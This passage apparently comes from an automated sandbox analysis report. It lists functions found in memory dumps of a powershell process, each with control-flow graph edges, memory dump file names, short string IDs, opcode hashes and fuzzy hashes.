                                                                                                                            Function 00C6B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 374 c6b490-c6b4a9 375 c6b4ae-c6b7f5 call c6acbc 374->375 376 c6b4ab 374->376 376->375
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: {Yq^$Yq^
                                                                                                                            • API String ID: 0-1785448187
                                                                                                                            • Opcode ID: 3f8ffb4af5d49b611e1a602bc67c6b6c638c70608a789d9629714f8b4eb4bd41
                                                                                                                            • Instruction ID: 5708bc0fe39f570cb90ac578f69a2aaa93c3c047432c24f9920ad5b655dfe5d2
                                                                                                                            • Opcode Fuzzy Hash: 3f8ffb4af5d49b611e1a602bc67c6b6c638c70608a789d9629714f8b4eb4bd41
                                                                                                                            • Instruction Fuzzy Hash: CA919AB1B006185BDB29EFB4C4156AFB7E2DF84704B04892DD50AAB350DF756E0A8BC6
                                                                                                                            Function 070A2308 Relevance: 13.1, Strings: 10, Instructions: 640COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$J8l$J8l$J8l$J8l$J8l$J8l$r7l$r7l
                                                                                                                            • API String ID: 0-3971769975
                                                                                                                            • Opcode ID: 971bd557004f58bbfaf03797489610a899f594dea32074508ac4fac6fd0aecf1
                                                                                                                            • Instruction ID: b7c8ab9b86ca4bacb6e093263e37886367096eafc15c8dbc79f01b636d6be94e
                                                                                                                            • Opcode Fuzzy Hash: 971bd557004f58bbfaf03797489610a899f594dea32074508ac4fac6fd0aecf1
                                                                                                                            • Instruction Fuzzy Hash: ED2227B1B0020AEFCB648FA8D4406AABBE6BFC6310F14817AE515DB251DB35DD45CBA1
                                                                                                                            Function 070A3CE8 Relevance: 5.6, Strings: 4, Instructions: 589COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 203 70a3ce8-70a3d0d 204 70a3d13-70a3d18 203->204 205 70a3f00-70a3f4a 203->205 206 70a3d1a-70a3d20 204->206 207 70a3d30-70a3d34 204->207 215 70a40ce-70a40e8 205->215 216 70a3f50-70a3f55 205->216 211 70a3d22 206->211 212 70a3d24-70a3d2e 206->212 208 70a3d3a-70a3d3c 207->208 209 70a3eb0-70a3eba 207->209 213 70a3d3e-70a3d4a 208->213 214 70a3d4c 208->214 217 70a3ec8-70a3ece 209->217 218 70a3ebc-70a3ec5 209->218 211->207 212->207 219 70a3d4e-70a3d50 213->219 214->219 232 70a40ea-70a4112 215->232 233 70a415b-70a415d 215->233 220 70a3f6d-70a3f71 216->220 221 70a3f57-70a3f5d 216->221 222 70a3ed0-70a3ed2 217->222 223 70a3ed4-70a3ee0 217->223 219->209 225 70a3d56-70a3d75 219->225 230 70a4080-70a408a 220->230 231 70a3f77-70a3f79 220->231 226 70a3f5f 221->226 227 70a3f61-70a3f6b 221->227 229 70a3ee2-70a3efd 222->229 223->229 276 70a3d77-70a3d83 225->276 277 70a3d85 225->277 226->220 227->220 235 70a408c-70a4094 230->235 236 70a4097-70a409d 230->236 237 70a3f7b-70a3f87 231->237 238 70a3f89 231->238 243 70a4228-70a424c 232->243 244 70a4118-70a411d 232->244 240 70a415f-70a4165 233->240 241 70a4177-70a417e 233->241 246 70a409f-70a40a1 236->246 247 70a40a3-70a40af 236->247 245 70a3f8b-70a3f8d 237->245 238->245 249 70a4169-70a4175 240->249 250 70a4167 240->250 253 70a4180-70a4186 241->253 254 70a4196-70a41d7 241->254 259 70a41da-70a41e4 243->259 268 70a424e-70a425d 243->268 251 70a411f-70a4125 244->251 252 70a4135-70a4139 244->252 245->230 255 70a3f93-70a3fb2 245->255 256 70a40b1-70a40cb 246->256 247->256 249->241 250->241 263 70a4129-70a4133 251->263 264 70a4127 251->264 252->259 260 70a413f-70a4141 252->260 265 70a418a-70a4194 253->265 266 70a4188 253->266 292 70a3fc2 255->292 293 70a3fb4-70a3fc0 255->293 274 70a41f1-70a41f7 259->274 275 70a41e6-70a41ee 259->275 269 70a4143-70a414f 260->269 270 70a4151 260->270 263->252 264->252 265->254 266->254 279 70a428b-70a4295 268->279 280 70a425f-70a4281 268->280 281 70a4153-70a4155 269->281 270->281 282 70a41f9-70a41fb 274->282 283 70a41fd-70a4209 274->283 284 70a3d87-70a3d89 276->284 277->284 286 70a429f-70a42a5 279->286 287 70a4297-70a429c 279->287 310 70a4283-70a4288 280->310 311 70a42d5-70a42fe 280->311 281->233 281->259 290 70a420b-70a4225 282->290 283->290 284->209 291 70a3d8f-70a3d96 284->291 297 70a42ab-70a42b7 286->297 298 70a42a7-70a42a9 286->298 291->205 296 70a3d9c-70a3da1 291->296 300 70a3fc4-70a3fc6 292->300 293->300 302 70a3db9-70a3dc8 296->302 303 70a3da3-70a3da9 296->303 299 70a42b9-70a42d2 297->299 298->299 300->230 304 70a3fcc-70a4003 300->304 302->209 314 70a3dce-70a3dec 302->314 306 70a3dab 303->306 307 70a3dad-70a3db7 303->307 327 70a401d-70a4024 304->327 328 70a4005-70a400b 304->328 306->302 307->302 323 70a432d-70a435c 311->323 324 70a4300-70a4326 311->324 314->209 326 70a3df2-70a3e17 314->326 335 70a435e-70a437b 323->335 336 70a4395-70a439f 323->336 324->323 326->209 352 70a3e1d-70a3e24 326->352 330 70a403c-70a407d 327->330 331 70a4026-70a402c 327->331 333 70a400f-70a401b 328->333 334 70a400d 328->334 337 70a402e 331->337 338 70a4030-70a403a 331->338 333->327 334->327 350 70a437d-70a438f 335->350 351 70a43e5-70a43ea 335->351 342 70a43a8-70a43ae 336->342 343 70a43a1-70a43a5 336->343 337->330 338->330 348 70a43b0-70a43b2 342->348 349 70a43b4-70a43c0 342->349 353 70a43c2-70a43e2 348->353 349->353 350->336 351->350 354 70a3e6a-70a3e9d 352->354 355 70a3e26-70a3e41 352->355 370 70a3ea4-70a3ead 354->370 362 70a3e5b-70a3e5f 355->362 363 70a3e43-70a3e49 355->363 367 70a3e66-70a3e68 362->367 365 70a3e4b 363->365 366 70a3e4d-70a3e59 363->366 365->362 366->362 367->370
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                            • API String ID: 0-1420252700
                                                                                                                            • Opcode ID: 28d025a2b52b9feef6a5ca08d78765fc6bfb9e398235cfc605ccbb59494239f9
                                                                                                                            • Instruction ID: e7299b9085cee2ef252e45cd65c52d0ae13691f6d8cc2b6a8e4c61a1cf993e07
                                                                                                                            • Opcode Fuzzy Hash: 28d025a2b52b9feef6a5ca08d78765fc6bfb9e398235cfc605ccbb59494239f9
                                                                                                                            • Instruction Fuzzy Hash: 741269B5B04286AFCB658BBC981166AFFE2AF81310F14C5BAE501CB351DB71DC45CBA1
                                                                                                                            Function 08206837 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 438 8206837-8206873 440 820687b-82068a7 SetThreadToken 438->440 441 82068b0-82068cd 440->441 442 82068a9-82068af 440->442 442->441
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1725826599.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_8200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254676861-0
                                                                                                                            • Opcode ID: 803476e73193d9e45faa05a85524da4a07250b566a9b619d80a3802d62fe7aff
                                                                                                                            • Instruction ID: 0e383ff48f4beb4ef45a2bca4e8cab265a75c4807eeed124f4d6a33a2bd5ad87
                                                                                                                            • Opcode Fuzzy Hash: 803476e73193d9e45faa05a85524da4a07250b566a9b619d80a3802d62fe7aff
                                                                                                                            • Instruction Fuzzy Hash: 0D1125B59003098FCB10DF9AC544BDEFFF8EB48320F24841AD558A7250D775A944CFA5
                                                                                                                            Function 08206838 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 445 8206838-82068a7 SetThreadToken 447 82068b0-82068cd 445->447 448 82068a9-82068af 445->448 448->447
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1725826599.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_8200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254676861-0
                                                                                                                            • Opcode ID: 110196c0e92df75728f5e38528a47fe440332cda77fd10007429622ecc2c6fd8
                                                                                                                            • Instruction ID: cc18e30cce7ad1aba1b6f0b1e97ad26342606665120ea89d2fba8f7e27cde04c
                                                                                                                            • Opcode Fuzzy Hash: 110196c0e92df75728f5e38528a47fe440332cda77fd10007429622ecc2c6fd8
                                                                                                                            • Instruction Fuzzy Hash: 0811F2B59003098FDB10DF9AC984B9EFBF8EB48324F24842AD558A7250D775A944CFA5
                                                                                                                            Function 00C66FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 451 c66fe0-c66fff 452 c67105-c67143 451->452 453 c67005-c67008 451->453 481 c6700a call c67697 453->481 482 c6700a call c6767c 453->482 455 c67010-c67022 456 c67024 455->456 457 c6702e-c67043 455->457 456->457 462 c670ce-c670e7 457->462 463 c67049-c67059 457->463 468 c670f2-c670f3 462->468 469 c670e9 462->469 466 c67065-c67073 call c6bf10 463->466 467 c6705b 463->467 473 c67079-c6707d 466->473 467->466 468->452 469->468 474 c6707f-c6708f 473->474 475 c670bd-c670c8 473->475 476 c67091-c670a9 474->476 477 c670ab-c670b5 474->477 475->462 475->463 476->475 477->475 481->455 482->455
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (bq
                                                                                                                            • API String ID: 0-149360118
                                                                                                                            • Opcode ID: f68cd24fecac365fa9eca509e5ed0b29d846dff6186368c998ada656d264e8ff
                                                                                                                            • Instruction ID: f73036dbab8464141bc134619b44746d6879ee1cdae2e7b1030a308c40848d43
                                                                                                                            • Opcode Fuzzy Hash: f68cd24fecac365fa9eca509e5ed0b29d846dff6186368c998ada656d264e8ff
                                                                                                                            • Instruction Fuzzy Hash: 80415F34B042048FDB24DF69C598AAEBBF2EF8D714F244599E406AB395CB35DD01CB60
                                                                                                                            Function 00C6E599 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 483 c6e599-c6e61e 491 c6e624-c6e63b 483->491 492 c6e6a2-c6e6bb 483->492 497 c6e643-c6e6a0 491->497 495 c6e6c6 492->495 496 c6e6bd 492->496 498 c6e6c7 495->498 496->495 497->491 497->492 498->498
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: J8l
                                                                                                                            • API String ID: 0-97097960
                                                                                                                            • Opcode ID: afc47f0c0f47ec9d8e2478b93291da2da4b072f2fece48ada7e18d2e1283981f
                                                                                                                            • Instruction ID: d410c8deea5b59cca5b18556babe5c3c67f81eabbc426180bda366e5d3f4a269
                                                                                                                            • Opcode Fuzzy Hash: afc47f0c0f47ec9d8e2478b93291da2da4b072f2fece48ada7e18d2e1283981f
                                                                                                                            • Instruction Fuzzy Hash: 57317C74A00209DFCB24DF69E994B9EBBF2FF48304F14852AE415A77A1DB34AD05CB91
                                                                                                                            Function 00C6E5A8 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 506 c6e5a8-c6e61e 513 c6e624-c6e63b 506->513 514 c6e6a2-c6e6bb 506->514 519 c6e643-c6e6a0 513->519 517 c6e6c6 514->517 518 c6e6bd 514->518 520 c6e6c7 517->520 518->517 519->513 519->514 520->520
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: J8l
                                                                                                                            • API String ID: 0-97097960
                                                                                                                            • Opcode ID: 6939ee2195b0541b7aeeb8c98cbf3cc39687d9c90c07490a5de0de816b50ddeb
                                                                                                                            • Instruction ID: 14efa6d5e151e2afb7523b3f2041b1a93ea5f4c18d638771d80ca473b455bb8b
                                                                                                                            • Opcode Fuzzy Hash: 6939ee2195b0541b7aeeb8c98cbf3cc39687d9c90c07490a5de0de816b50ddeb
                                                                                                                            • Instruction Fuzzy Hash: A9317E34A00209CFCB24DF69D594B9EBBF1FF48300F14852AE415A77A1DB34AD05CB90
                                                                                                                            Function 00C6AF98 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 528 c6af98-c6afa1 call c6a984 530 c6afa6-c6afaa 528->530 531 c6afac-c6afb9 530->531 532 c6afba-c6b055 530->532 538 c6b057-c6b05d 532->538 539 c6b05e-c6b07b 532->539 538->539
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (&^q
                                                                                                                            • API String ID: 0-2067289071
                                                                                                                            • Opcode ID: 5c61021707e56dc42aef7cfdea78ddc758ef8fb813bc4f4b700904482f183279
                                                                                                                            • Instruction ID: 80b6c2d698f7881a383c79119abe0ade4562cb7ce0cf9edd59659caa70f86af3
                                                                                                                            • Opcode Fuzzy Hash: 5c61021707e56dc42aef7cfdea78ddc758ef8fb813bc4f4b700904482f183279
                                                                                                                            • Instruction Fuzzy Hash: DC219C71A042588FCB24DBAED4447AEBFF5EF88320F24846AE518E7340CB7599458FA5
                                                                                                                            Function 00C6DC97 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 542 c6dc97-c6dcad 545 c6dcb6 542->545 546 c6dcaf 542->546 547 c6dcbe-c6dcc8 545->547 546->545 549 c6dcca call c6dd12 547->549 550 c6dcca call c6dce8 547->550 551 c6dcca call c6dc88 547->551 552 c6dcca call c6dcd9 547->552 548 c6dcd0-c6dcd3 549->548 550->548 551->548 552->548
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +/q^
                                                                                                                            • API String ID: 0-1558806512
                                                                                                                            • Opcode ID: 49e1b90bbbef0291c3d4fd4020d466f45dc27da1d0c1de4923623fde057ddaa7
                                                                                                                            • Instruction ID: 3f219e498e35b06d021bc009c8e4e6fbcd356f5b3f5258c2319336ad0becbf75
                                                                                                                            • Opcode Fuzzy Hash: 49e1b90bbbef0291c3d4fd4020d466f45dc27da1d0c1de4923623fde057ddaa7
                                                                                                                            • Instruction Fuzzy Hash: 30E0C271B40A181B8621A63EA8119AFBBDADFC4771304403FF12AC7740DEA4DD0587E6
                                                                                                                            Function 00C6DC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 553 c6dc98-c6dcad 555 c6dcb6-c6dcc8 553->555 556 c6dcaf 553->556 559 c6dcca call c6dd12 555->559 560 c6dcca call c6dce8 555->560 561 c6dcca call c6dc88 555->561 562 c6dcca call c6dcd9 555->562 556->555 558 c6dcd0-c6dcd3 559->558 560->558 561->558 562->558
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +/q^
                                                                                                                            • API String ID: 0-1558806512
                                                                                                                            • Opcode ID: 85120133742b659bc4f6a3950469111939e9547f7db4c50f3d2e25959d67c184
                                                                                                                            • Instruction ID: 84f5b6e396809dc56dee52dca80c46788340f4527668c10691f8ab2a666adefc
                                                                                                                            • Opcode Fuzzy Hash: 85120133742b659bc4f6a3950469111939e9547f7db4c50f3d2e25959d67c184
                                                                                                                            • Instruction Fuzzy Hash: 46E0C271B40A181B8621A63EA81095FB7DADFC4771304403FF12AC7340DEA4DD0587D5
                                                                                                                            Function 00C629F0 Relevance: .2, Instructions: 210COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 868 c629f0-c62a1e 869 c62a24-c62a3a 868->869 870 c62af5-c62b37 868->870 871 c62a3f-c62a52 869->871 872 c62a3c 869->872 874 c62c51-c62c61 870->874 875 c62b3d-c62b56 870->875 871->870 881 c62a58-c62a65 871->881 872->871 877 c62b5b-c62b69 875->877 878 c62b58 875->878 877->874 885 c62b6f-c62b79 877->885 878->877 882 c62a67 881->882 883 c62a6a-c62a7c 881->883 882->883 883->870 889 c62a7e-c62a88 883->889 887 c62b87-c62b94 885->887 888 c62b7b-c62b7d 885->888 887->874 890 c62b9a-c62baa 887->890 888->887 891 c62a96-c62aa6 889->891 892 c62a8a-c62a8c 889->892 893 c62baf-c62bbd 890->893 894 c62bac 890->894 891->870 895 c62aa8-c62ab2 891->895 892->891 893->874 899 c62bc3-c62bd3 893->899 894->893 896 c62ab4-c62ab6 895->896 897 c62ac0-c62af4 895->897 896->897 900 c62bd5 899->900 901 c62bd8-c62be5 899->901 900->901 901->874 905 c62be7-c62bf7 901->905 906 c62bfc-c62c08 905->906 907 c62bf9 905->907 906->874 909 c62c0a-c62c24 906->909 907->906 910 c62c26 909->910 911 c62c29 909->911 910->911 912 c62c2e-c62c38 911->912 913 c62c3d-c62c50 912->913
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 702ebfb66539a700a4a2ae376f3ab1b17f7fab7f804c2241de2b5905781e11ff
                                                                                                                            • Instruction ID: c724e3f147bd3c9b6e79cece4338f9861bf7c99ead820c038fa3f3132090fea5
                                                                                                                            • Opcode Fuzzy Hash: 702ebfb66539a700a4a2ae376f3ab1b17f7fab7f804c2241de2b5905781e11ff
                                                                                                                            • Instruction Fuzzy Hash: 919169B0A006059FCB25CF99C4D49AEFBB1FF88310B248599D915AB365C735FC51CBA0
                                                                                                                            Function 00C67740 Relevance: .2, Instructions: 157COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 74ffbbc04d2984ae52c4f3a4b06efc9c398a00301625d27668239181892b1684
                                                                                                                            • Instruction ID: 9753c5818bc97604627b037281c87853c4e5b56a99d2394b020d16418b5084fb
                                                                                                                            • Opcode Fuzzy Hash: 74ffbbc04d2984ae52c4f3a4b06efc9c398a00301625d27668239181892b1684
                                                                                                                            • Instruction Fuzzy Hash: 415106343082059FD714DB79D884A6B7BEAFFC8314B144A6AE409DB392DB35DC01CB90
                                                                                                                            Function 00C6BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8e345a4f4e962e4ee00f82789c0cbdb73ede679a60d3357e4e6cd9274f1e900d
                                                                                                                            • Instruction ID: ad5dddb6e8ba89b733305c2b15741ac55de1fa93a93df64f43d7a6123773fac9
                                                                                                                            • Opcode Fuzzy Hash: 8e345a4f4e962e4ee00f82789c0cbdb73ede679a60d3357e4e6cd9274f1e900d
                                                                                                                            • Instruction Fuzzy Hash: C461F871E002489FCB24DFA9D584B9DFBF5EF88310F24816AE819AB364DB349D85CB50
                                                                                                                            Function 00C6BAB0 Relevance: .2, Instructions: 154COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ef565285aba69c6061aa67b83a118db13563e23f0345278415e9dc9f9adf0e6e
                                                                                                                            • Instruction ID: f1f6d6a76442630d9e4862c45d85dece57744169aea95275a7dc1ed997397ec7
                                                                                                                            • Opcode Fuzzy Hash: ef565285aba69c6061aa67b83a118db13563e23f0345278415e9dc9f9adf0e6e
                                                                                                                            • Instruction Fuzzy Hash: 9E51F671E002489FCB24DFA9D584B9DFBF5EF88310F14816AE819AB264EB349D85CB51
                                                                                                                            Function 00C6E391 Relevance: .1, Instructions: 139COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ba586c29578d66dd850aef908b339d81f5b0b0afdc347c754c766a03f906317
                                                                                                                            • Instruction ID: 7810a98452730529ac38a043136dc62ad4d8df84cd837b292f36e45137753c70
                                                                                                                            • Opcode Fuzzy Hash: 5ba586c29578d66dd850aef908b339d81f5b0b0afdc347c754c766a03f906317
                                                                                                                            • Instruction Fuzzy Hash: C14180B47002058FCB24DFBDD59496ABBE6EF88304B15846AF559CF369EB34ED018B90
                                                                                                                            Function 00C6E3A0 Relevance: .1, Instructions: 130COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6c70547799b06f8207845b34cc9fbd26e46e688b4612af42de739dafca29a555
                                                                                                                            • Instruction ID: 589166713460e5886a422d0a9ae173f08981349c63b95cd83ec3fc21643fa6a1
                                                                                                                            • Opcode Fuzzy Hash: 6c70547799b06f8207845b34cc9fbd26e46e688b4612af42de739dafca29a555
                                                                                                                            • Instruction Fuzzy Hash: C6417FB47002058FCB24DFBDC59496ABBE6EF88304B14806AF459CB329EB34ED018B90
                                                                                                                            Function 070A3CCD Relevance: .1, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 03a54d0995c487da350d244d051abd9e102dbeebdd4dc3dfd2de09683ebd010f
                                                                                                                            • Instruction ID: c3f9f20c2bd8d4424246b41d48bbc3e481b5a826f55bb8b87b4bb2eb8804384b
                                                                                                                            • Opcode Fuzzy Hash: 03a54d0995c487da350d244d051abd9e102dbeebdd4dc3dfd2de09683ebd010f
                                                                                                                            • Instruction Fuzzy Hash: C44104F0B10202EFCB658FA4C941A6AFBF2AF81354F1982A5D9009F295D735ED44CBA5
                                                                                                                            Function 00C62B00 Relevance: .1, Instructions: 109COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8415d8472bbe73a1e34c1d58e9f53f5161edbaf511a169ea03cbaf3977e8bc56
                                                                                                                            • Instruction ID: 6e1f0690b707fa1598749ccabcfabd638e04e8295c6d0ee7e7f5ec797ade8c6e
                                                                                                                            • Opcode Fuzzy Hash: 8415d8472bbe73a1e34c1d58e9f53f5161edbaf511a169ea03cbaf3977e8bc56
                                                                                                                            • Instruction Fuzzy Hash: F74114B4A006059FCB19CF59C5D89AEFBB1FF48310B218199D915AB364C736FD91CBA0
                                                                                                                            Function 00C6DCD9 Relevance: .1, Instructions: 108COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
